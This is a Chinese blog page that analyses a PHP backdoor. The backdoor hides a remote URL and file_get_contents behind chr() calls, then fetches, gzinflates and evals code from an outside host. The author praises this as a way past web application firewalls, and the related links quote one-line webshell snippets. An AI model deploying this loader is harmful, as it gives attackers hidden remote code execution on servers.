php解析的过程,一个PHP后门的分析过程

最新推荐文章于 2021-12-01 09:00:00 发布
最新推荐文章于 2021-12-01 09:00:00 发布
阅读量189 收藏
点赞数
文章标签: php解析的过程
本文详细记录了分析一个后门程序的过程,该程序通过调用远程加密代码来规避Web应用防火墙(WAF)的检测,特别是安全狗。程序中包含了URL构造、文件获取及解码等步骤,表明了攻击者巧妙地利用编码和解码技巧以绕过安全防护。
摘要由CSDN通过智能技术生成

$password='123';

//----------功能程序------------------//

$c="chr";//字符串

session_start();

if(empty($_SESSION['PhpCode'])){

$url.=$c(104).$c(116).$c(116).$c(112).$c(58);

$url.=$c(47).$c(47).$c(104).$c(106).$c(105);

$url.=$c(117).$c(46).$c(108).$c(97).$c(47);

$url.=$c(115).$c(99).$c(120).$c(112).$c(46);

$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo $get($url);

$_SESSION['PhpCode']=$get($url);

}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);

$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);

//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate 解码处理

@eval($unzip($_SESSION['PhpCode']));

?>

今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。

涌馨
关注
php大马程序_php大马是什么
weixin_35406877的博客
03-08 1002
大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 (推荐学习:PHP视频教程)...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1814
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
php解析
qq_36346877的博客
08-04 423
转义符 \n 换行 \r 回车 \t 水平制表符 (tab) \\    \ \'     ' \*    * \$   $   单引号 只解析\'和\\两个转义符 双引号解析所有转义符   //php引擎在解析变量的时候会尽可能多的向后取合法字符,认为取得越多,这个变量的含义就越明确 花括号 <?php //对于字符串中的指定字符做增删改查操作 $stri...
PHP后门
qq_41750040的博客
03-28 981
<?php $admin['check'] = false; $password = 'chenff';//ÉèÖÃÃÜÂë $c = "chr"; session_start(); if (empty($_SESSION['PhpCode'])) { $url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47); $...
php入侵检查,怀疑网站有入侵,请帮忙看看这几个PHP
weixin_29370077的博客
03-13 375
[PHP] 纯文本查看 复制代码
php判断编码函数,PHP判断字符串编码是不是为utf8的函数
weixin_39559119的博客
03-11 119
...)。 如果我们提交下面的代码会怎么样呢? ?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(...ol:no-cache"); header("ContentType: Image/BMP"...
一个不易被发现的PHP后门代码解析
10-25
在代码解析中提到,攻击者利用了一个常见的视觉盲点,即使用了一个位于Esc键下方的特殊符号。这个符号是波浪号(~),其在键盘上的位置紧邻着感叹号(!)下方。这种利用方式的隐蔽性非常好,因为波浪号是键盘上的...
一款PHP商城可以自定义上传商品整站源码打包「无后门
最新发布
03-10
"一款PHP商城可以自定义上传商品整站源码打包「无后门」" 这个标题表明我们讨论的是一个基于PHP编程语言的电子商务网站平台。"整站源码打包"意味着提供了完整的网站代码,包括前端和后台的所有功能模块。"自定义上传...
【4333】PHP素材资源解析平台源码V8.0.rar
07-25
PHP素材资源解析平台源码V8.0】是一个基于PHP开发的系统,主要用于解析和下载各类在线素材资源。此平台适用于那些希望构建一个能够帮助用户便捷获取网络上如千图网、千库网等知名素材网站资源的站点。源码的发布...
PHP基础巩固【关于PHP经常出现的木马防护】
代码存储室
10-17 668
随着接触过的站越来越多,你总会遇到各种各样的“黑客”,这时候你遇到的基本是最初级的青铜黑客选手。在你的网站根目录放入各种各样的马。最小的马就是所谓一句话木马,这种应该遇到最多,也比较不好找,因为常常会伪装成各种各样的图片。最大的马可以获取你整个服务器的资源并加以篡改。接下来举几个栗子。 1.一句话木马 这种代码最常见。代码如下: //这里执行的是php代码 @eval($_POST['自己...
php大马(webshell)
05-26
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
php木马问题
weixin_33910759的博客
01-18 142
为什么80%的码农都做不了架构师?>>> ...
mysql 反序列化_Joomla 3.4.5 反序列化漏洞(CVE-2015-8562) 分析
weixin_39950470的博客
12-10 492
0x00在一番深思之后准备开始理解各大cms厂商的CVE漏洞。作为国外大佬之一的joomla是一个不错选择。依据便捷有效的观点,我在vulhub找到了joomla的典型漏洞之一 cve-2015-8562作为第一个下手的目标。0x01在初步了解漏洞之后决定开始进行测试。在通过vulhub的docker创建镜像时遇到几个问题:1.国外的源并不更新或更新很慢;2.vulhub使用的debian现在已经...
解析一个PHP木马,PHP文件上传安全检测组件
Z.X的博客
12-01 6544
2021年12月1日08:43:32 前几天同事问我一个关于图片文件检测是否是脚本的问题,问题的根源就是文件上传图片,是否是隐藏的脚本问题 木马文件源码是这样的: <?php $password='phpyyds';//登录密码 //----------本程序完美支持PHP 4, PHP 5, PHP 7------------------// $c="chr"; session_sta...
php图片大马加后门,一次对php大马的后门的简单分析
weixin_30923925的博客
03-12 608
一次对php大马的后门的简单分析有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
ASCII码对应表chr(9)、chr(10)、chr(13)、chr(32)、chr(34)、chr(39)、chr(..
热门推荐
欧辰的专栏
11-04 22万+
chr(9) tab空格       chr(10) 换行      chr(13) 回车        Chr(13)&chr(10) 回车换行       chr(32) 空格符       chr(34) 双引号       chr(39) 单引号 chr(33) !        chr(34) "        chr(35) #        chr(36) $        c
php 登录记住密码,PHP 登录记住密码实现思路
weixin_32541505的博客
03-09 234
复制代码 代码如下:用户名密码记住密码用户信息session_start();function p($arr){echo "";print_r($arr);echo "";}p($_SESSION);p($_COOKIE);?>登录页面复制代码 代码如下:function p($arr){echo "";print_r($arr);echo "";}session_start();//p($...
php登录用户信息存放在,PHP中使用session实现保存用户登录信息
weixin_28829325的博客
03-28 405
PHP中使用session实现保存用户登录信息if(isset($_POST['submit'])){//用户提交登录表单时执行如下代码$dbc = mysqli_connect(DB_HOST,DB_USER,DB_PASSWORD,DB_NAME);$user_username = mysqli_real_escape_string($dbc,trim($_POST['username']))...
PHP无eval后门技巧解析
1. `create_function`:这是一个可以创建匿名函数的构造器,它允许将字符串作为执行的代码。尽管有传言称PHP 7中不再支持,但实际并非如此,它仍然可以工作。 2. 使用`/e`修饰符的`preg_replace`和`preg_filter`函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值